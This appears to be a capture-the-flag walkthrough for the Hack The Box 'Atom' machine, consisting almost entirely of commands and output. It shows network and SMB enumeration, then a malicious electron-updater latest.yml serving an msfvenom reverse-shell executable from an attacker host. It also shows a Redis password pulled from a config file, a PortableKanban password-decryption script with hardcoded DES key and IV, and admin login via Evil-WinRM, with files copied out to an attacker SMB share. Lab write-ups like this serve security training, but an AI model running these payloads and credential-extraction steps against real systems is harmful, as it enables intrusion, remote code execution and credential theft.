nmap -p- -T4 -A 10.10.10.237
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Heed Solutions
135/tcp open msrpc Microsoft Windows RPC
443/tcp open ssl/http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Heed Solutions
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
6379/tcp open redis Redis key-value store
7680/tcp open pando-pub?
Service Info: Host: ATOM; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h30m41s, deviation: 4h02m30s, median: 10m40s
| smb-os-discovery:
| OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: ATOM
| NetBIOS computer name: ATOM\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-04-26T08:56:21-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-04-26T15:56:23
|_ start_date: N/A
$ dirb http://10.10.10.237
---- Entering directory: http://10.10.10.237/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.237/Images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.237/releases/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
kali@kali:~/0.htb/machines/Atom237$ smbclient -L //10.10.10.237/ -N
Enter WORKGROUP\kali's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
Software_Updates Disk
SMB1 disabled -- no workgroup available
kali@kali:~/0.htb/machines/Atom237$ smbclient //10.10.10.237/Software_Updates
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon Apr 26 12:01:33 2021
.. D 0 Mon Apr 26 12:01:33 2021
client1 D 0 Mon Apr 26 12:01:33 2021
client2 D 0 Mon Apr 26 12:01:33 2021
client3 D 0 Mon Apr 26 12:01:33 2021
UAT_Testing_Procedures.pdf A 35202 Fri Apr 9 07:18:08 2021
4413951 blocks of size 4096. 1354954 blocks available
On the web and clues from UAT...pdf
MrR3boot@atom.htb
Ofc from codepen.
https://codepen.io/
electron-builder
https://blog.doyensec.com/2020/02/24/electron-updater-update-signature-bypass.html
$ msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.42 lport=1881 -f exe > "r'okan.exe"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
$ shasum -a 512 "r'okan.exe" | cut -d " " -f1 | xxd -r -p | base64 -w 0
e0nY0c2Zo+KeQTuSWXHdWaMgcFLaRcJGjj9ny5VQ+aa93Z305XZezLr0L66DF60SXjE3aTcmozGeZzGvqNrIA==
latest.yml
version : 1.2.3
path : http://10.10.14.42:8000/r'okan.exe
sha512 : e0nY0c2Zo+KeQTuSWXHdWaMgcFLaRcJGjj9ny5VQ+aa93Z305XZezLr0L66DF60SXjE3aTcmozG/eZzGvqNrIA==
$ msfconsole
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.10.14.42
lhost => 10.10.14.42
msf6 exploit(multi/handler) > set lport 1881
lport => 1881
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.42:1881
$ smbclient "\\\\10.10.10.237\Software_Updates"
smb: \> cd client3
smb: \client3\> put latest.yml
putting file latest.yml as \client3\latest.yml (2.0 kb/s) (average 1.5 kb/s)
smb: \client3\>
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.42:1881
[*] Sending stage (175174 bytes) to 10.10.10.237
[*] Meterpreter session 1 opened (10.10.14.42:1881 -> 10.10.10.237:65287) at 2021-06-18 14:33:27 -0400
meterpreter >
meterpreter > shell
Process 5088 created.
Channel 2 created.
Microsoft Windows [Version 10.0.19042.906]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>cd \Users\jason\Desktop
cd \Users\jason\Desktop
C:\Users\jason\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9793-C2E6
Directory of C:\Users\jason\Desktop
04/02/2021 10:29 PM <DIR> .
04/02/2021 10:29 PM <DIR> ..
03/31/2021 02:09 AM 2,353 heedv1.lnk
03/31/2021 02:09 AM 2,353 heedv2.lnk
03/31/2021 02:09 AM 2,353 heedv3.lnk
06/17/2021 09:57 PM 34 user.txt
4 File(s) 7,093 bytes
2 Dir(s) 5,521,301,504 bytes free
C:\Users\jason\Desktop>type user.txt
type user.txt
0c3fe169a45f05a23c3968cb6c334ade
winPEASx64.exe
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe/binaries/x64/Release
winPEAS:
redis.windows-service.conf
redis-server.
C:\Program Files\Redis>type redis.windows-service.conf
type redis.windows-service.conf
# Redis configuration file example
requirepass kidvscat_yes_kidvscat
requirepass kidvscat_yes_kidvscat
https://gist.github.com/LeCoupa/1596b8f359ad8812c7271b5322c30946
$ redis-cli -h 10.10.10.237 -a kidvscat_yes_kidvscat
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
10.10.10.237:6379> keys *
1) "pk:ids:MetaDataClass"
2) "pk:ids:User"
3) "pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0"
4) "pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff"
10.10.10.237:6379> get pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0
"{\"Id\":\"e8e29158d70d44b1a1ba4949d52790a0\",\"Name\":\"Administrator\",\"Initials\":\"\",\"Email\":\"\",\"EncryptedPassword\":\"Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi\",\"Role\":\"Admin\",\"Inactive\":false,\"TimeStamp\":637530169606440253}"
10.10.10.237:6379>
admin EncryptedPassword = Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi\
kali@kali:~/0.htb/machines/Atom237$ sudo impacket-smbserver kali .
[sudo] password for kali:
Impacket v0.9.23.dev1 - Copyright 2020 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.237,65526)
[*] AUTHENTICATE_MESSAGE (\,ATOM)
[*] User ATOM\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:KALI)
*Evil-WinRM* PS C:\Users\jason\Downloads\PortableKanban> copy *.pdf \\10.10.14.42\kali
*Evil-WinRM* PS C:\Users\jason\Downloads\PortableKanban>
*Evil-WinRM* PS C:\Users\jason\Downloads> copy \\10.10.14.42\kali\winpeas.exe .
*Evil-WinRM* PS C:\Users\jason\Downloads> dir
*Evil-WinRM* PS C:\Users\jason\Downloads> ./winpeas >peas.txt
*Evil-WinRM* PS C:\Users\jason\Downloads> dir
Directory: C:\Users\jason\Downloads
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/31/2021 2:36 AM node_modules
d----- 6/18/2021 12:04 PM PortableKanban
-a---- 6/18/2021 1:27 PM 1515726 peas.txt
-a---- 6/18/2021 12:53 PM 1566720 winpeas.exe
*Evil-WinRM* PS C:\Users\jason\Downloads> copy peas.txt \\10.10.14.42\kali
*Evil-WinRM* PS C:\Users\jason\Downloads>
kali@kali:~/0.htb/machines/Atom237$ cat peas.txt |more
c:\Users\jason\Downloads\PortableKanban>
https://www.exploit-db.com/exploits/49409
https://www.torchsec.net/portablekanban-4-3-6578-38136-encrypted-password-disclosure-torchsec
decypt.py
#!/bin/python3
import json
import base64
from des import * #python3 -m pip install des
def decode ( hash ) :
hash = base64 . b64decode ( hash . encode ( 'utf-8' ) )
key = DesKey ( b"7ly6UznJ" )
return key . decrypt ( hash , initial = b"XuVUm5fR" , padding = True ) . decode ( 'utf-8' )
print ( decode ( 'Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi' ) )
kali@kali:~/0.htb/machines/Atom237$ python3 decypt.py
kidvscat_admin_@123
kali@kali:~/0.htb/machines/Atom237$
kali@kali:~/0.htb/machines/Atom237$ evil-winrm -i 10.10.10.237 -u 'administrator' -p 'kidvscat_admin_@123'
Evil-WinRM shell v2.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir
Directory: C:\Users\Administrator\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/2/2021 8:22 PM 608 dump.rdb
-a---- 4/2/2021 10:49 PM 204 run.bat
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
b7d7c5533b1bf1be01b7cea65b23db30
*Evil-WinRM* PS C:\Users\Administrator\Documents>